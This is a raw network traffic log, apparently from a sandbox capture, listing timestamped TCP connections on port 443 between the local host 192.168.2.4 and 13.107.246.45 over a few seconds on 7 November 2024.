Nov 7, 2024 07:33:00.317013979 CET	443	49747	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.317018986 CET	443	49745	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.317045927 CET	49745	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.317049980 CET	443	49745	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.317075968 CET	49749	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.317104101 CET	443	49749	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.317156076 CET	49749	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.317200899 CET	443	49747	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.317246914 CET	49747	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.317255974 CET	49747	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.317260027 CET	443	49747	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.334585905 CET	49749	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.334599972 CET	443	49749	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.338175058 CET	49746	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.338200092 CET	443	49746	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.338212967 CET	49746	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.338218927 CET	443	49746	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.349963903 CET	49750	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.349982977 CET	443	49750	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.350049973 CET	49750	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.362335920 CET	49751	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.362356901 CET	443	49751	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.362421036 CET	49751	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.408464909 CET	49752	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.408514977 CET	443	49752	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.408576965 CET	49752	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.408761024 CET	49750	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.408771038 CET	443	49750	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.409039974 CET	49751	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.409055948 CET	443	49751	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.419526100 CET	49752	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.419543028 CET	443	49752	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.034518957 CET	443	49748	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.034943104 CET	49748	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.034976006 CET	443	49748	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.035432100 CET	49748	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.035438061 CET	443	49748	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.050591946 CET	443	49749	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.050935030 CET	49749	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.050960064 CET	443	49749	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.051273108 CET	49749	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.051278114 CET	443	49749	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.146733999 CET	443	49750	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.147105932 CET	49750	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.147133112 CET	443	49750	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.147475958 CET	49750	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.147480011 CET	443	49750	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.148952961 CET	443	49752	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.149250031 CET	49752	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.149292946 CET	443	49752	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.149621010 CET	49752	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.149637938 CET	443	49752	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.165518999 CET	443	49748	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.165904045 CET	443	49748	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.166053057 CET	49748	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.166053057 CET	49748	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.166053057 CET	49748	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.168482065 CET	49753	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.168510914 CET	443	49753	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.168576956 CET	49753	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.168694019 CET	49753	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.168708086 CET	443	49753	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.170733929 CET	443	49751	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.171341896 CET	49751	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.171349049 CET	443	49751	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.171700954 CET	49751	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.171705008 CET	443	49751	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.178177118 CET	443	49749	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.178530931 CET	443	49749	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.178585052 CET	49749	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.178621054 CET	49749	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.178632021 CET	443	49749	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.178638935 CET	49749	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.178642988 CET	443	49749	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.180205107 CET	49754	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.180228949 CET	443	49754	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.180296898 CET	49754	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.180397987 CET	49754	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.180404902 CET	443	49754	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.285907984 CET	443	49752	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.286175966 CET	443	49752	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.286216021 CET	49752	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.287087917 CET	443	49750	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.287121058 CET	49752	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.287137032 CET	443	49752	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.287146091 CET	49752	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.287152052 CET	443	49752	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.287626028 CET	443	49750	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.287674904 CET	49750	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.288038015 CET	49750	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.288047075 CET	443	49750	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.288055897 CET	49750	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.288059950 CET	443	49750	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.290149927 CET	49755	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.290169954 CET	443	49755	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.290236950 CET	49755	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.290725946 CET	49756	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.290759087 CET	443	49756	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.290817022 CET	49756	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.290888071 CET	49755	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.290899038 CET	443	49755	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.291203022 CET	49756	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.291219950 CET	443	49756	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.299505949 CET	443	49751	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.299652100 CET	443	49751	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.299700022 CET	49751	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.299742937 CET	49751	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.299757004 CET	443	49751	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.299767971 CET	49751	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.299772978 CET	443	49751	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.302202940 CET	49757	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.302229881 CET	443	49757	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.302298069 CET	49757	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.302386045 CET	49757	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.302397966 CET	443	49757	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.478728056 CET	49748	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.478734970 CET	443	49748	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.895139933 CET	443	49753	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.899346113 CET	49753	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.899363041 CET	443	49753	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.899797916 CET	49753	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.899804115 CET	443	49753	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.901932955 CET	443	49754	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.903224945 CET	49754	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.903261900 CET	443	49754	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:01.903620958 CET	49754	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:01.903640032 CET	443	49754	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.024072886 CET	443	49753	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.024125099 CET	443	49753	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.024199963 CET	49753	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.024391890 CET	49753	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.024404049 CET	443	49753	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.024416924 CET	49753	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.024420977 CET	443	49753	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.028249979 CET	49758	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.028285027 CET	443	49758	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.028367996 CET	49758	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.028812885 CET	49758	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.028826952 CET	443	49758	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.030185938 CET	443	49756	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.030658960 CET	49756	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.030674934 CET	443	49756	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.031039953 CET	49756	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.031049013 CET	443	49756	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.033911943 CET	443	49757	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.034251928 CET	49757	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.034265041 CET	443	49757	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.034699917 CET	49757	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.034703970 CET	443	49757	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.060942888 CET	443	49755	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.065325975 CET	49755	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.065334082 CET	443	49755	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.065710068 CET	49755	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.065713882 CET	443	49755	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.108026981 CET	443	49754	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.108078003 CET	443	49754	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.108139038 CET	49754	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.118465900 CET	49754	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.118465900 CET	49754	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.118515968 CET	443	49754	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.118546963 CET	443	49754	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.129888058 CET	49759	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.129914999 CET	443	49759	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.129983902 CET	49759	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.130543947 CET	49759	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.130556107 CET	443	49759	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.162548065 CET	443	49756	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.163696051 CET	443	49756	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.163762093 CET	49756	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.163799047 CET	49756	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.163813114 CET	443	49756	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.163822889 CET	49756	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.163827896 CET	443	49756	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.163950920 CET	443	49757	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.164165020 CET	443	49757	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.164215088 CET	49757	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.164302111 CET	49757	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.164309978 CET	443	49757	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.164343119 CET	49757	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.164346933 CET	443	49757	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.166781902 CET	49760	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.166834116 CET	443	49760	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.166903019 CET	49760	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.166981936 CET	49761	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.167010069 CET	443	49761	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.167134047 CET	49761	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.167135954 CET	49760	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.167152882 CET	443	49760	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.167267084 CET	49761	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.167280912 CET	443	49761	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.199004889 CET	443	49755	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.199048042 CET	443	49755	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.199106932 CET	49755	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.199208021 CET	49755	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.199208021 CET	49755	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.199214935 CET	443	49755	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.199223995 CET	443	49755	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.200947046 CET	49762	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.200959921 CET	443	49762	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.201028109 CET	49762	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.201159954 CET	49762	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.201173067 CET	443	49762	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.763329029 CET	443	49758	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.806756973 CET	49758	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.859956980 CET	49758	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.859972954 CET	443	49758	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.860383034 CET	49758	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.860388041 CET	443	49758	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.868398905 CET	443	49759	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.871217966 CET	49759	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.871232986 CET	443	49759	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.871587038 CET	49759	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.871592045 CET	443	49759	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.896648884 CET	443	49761	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.904761076 CET	49761	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.904774904 CET	443	49761	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.905155897 CET	49761	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.905159950 CET	443	49761	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.908837080 CET	443	49760	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.928783894 CET	443	49762	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.941704035 CET	49760	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.941745996 CET	443	49760	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.942122936 CET	49760	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.942131042 CET	443	49760	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.942384005 CET	49762	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.942390919 CET	443	49762	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.942723036 CET	49762	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.942728043 CET	443	49762	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.985018015 CET	443	49758	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.985173941 CET	443	49758	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.985245943 CET	49758	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.985488892 CET	49758	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.985503912 CET	443	49758	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:02.985512972 CET	49758	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:02.985517025 CET	443	49758	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.001323938 CET	443	49759	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.001534939 CET	443	49759	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.001610041 CET	49759	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.009032011 CET	49759	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.009043932 CET	443	49759	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.009052992 CET	49759	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.009057045 CET	443	49759	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.024983883 CET	49763	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.024998903 CET	443	49763	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.025078058 CET	49763	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.030858994 CET	443	49761	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.030901909 CET	443	49761	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.030970097 CET	49761	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.032032967 CET	49763	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.032043934 CET	443	49763	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.035228968 CET	49761	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.035233974 CET	443	49761	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.055439949 CET	49764	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.055469036 CET	443	49764	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.055526972 CET	49764	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.058556080 CET	49764	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.058568954 CET	443	49764	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.067543983 CET	443	49762	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.067964077 CET	443	49762	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.068032980 CET	49762	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.069902897 CET	443	49760	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.069947004 CET	443	49760	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.070014954 CET	49760	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.079539061 CET	49765	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.079567909 CET	443	49765	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.079643011 CET	49765	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.079674959 CET	49762	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.079689980 CET	443	49762	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.079701900 CET	49762	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.079708099 CET	443	49762	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.095663071 CET	49760	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.095669985 CET	443	49760	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.095679998 CET	49760	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.095684052 CET	443	49760	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.103962898 CET	49765	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.103977919 CET	443	49765	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.145813942 CET	49766	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.145824909 CET	443	49766	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.145885944 CET	49766	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.176611900 CET	49766	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.176624060 CET	443	49766	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.185030937 CET	49767	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.185043097 CET	443	49767	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.185103893 CET	49767	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.185245037 CET	49767	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.185252905 CET	443	49767	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.764966011 CET	443	49763	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.765458107 CET	49763	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.765474081 CET	443	49763	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.765935898 CET	49763	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.765942097 CET	443	49763	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.787008047 CET	443	49764	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.787291050 CET	49764	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.787306070 CET	443	49764	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.787659883 CET	49764	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.787666082 CET	443	49764	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.869592905 CET	443	49765	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.870033979 CET	49765	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.870049000 CET	443	49765	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.870475054 CET	49765	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.870480061 CET	443	49765	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.893512011 CET	443	49763	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.893627882 CET	443	49763	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.893688917 CET	49763	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.893789053 CET	49763	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.893800020 CET	443	49763	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.893810034 CET	49763	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.893817902 CET	443	49763	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.896173954 CET	49768	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.896244049 CET	443	49768	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.896323919 CET	49768	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.896596909 CET	49768	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.896630049 CET	443	49768	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.902106047 CET	443	49766	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.902403116 CET	49766	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.902415991 CET	443	49766	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.902751923 CET	49766	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.902755976 CET	443	49766	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.903825998 CET	443	49767	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.904097080 CET	49767	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.904104948 CET	443	49767	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.904427052 CET	49767	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.904431105 CET	443	49767	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.916960001 CET	443	49764	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.917139053 CET	443	49764	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.917195082 CET	49764	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.917223930 CET	49764	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.917234898 CET	443	49764	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.917243004 CET	49764	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.917248964 CET	443	49764	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.919231892 CET	49769	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.919260025 CET	443	49769	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:03.919337988 CET	49769	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.919522047 CET	49769	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:03.919534922 CET	443	49769	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.005040884 CET	443	49765	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.005098104 CET	443	49765	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.005145073 CET	49765	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.005383015 CET	49765	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.005392075 CET	443	49765	13.107.246.45	192.168.2.4
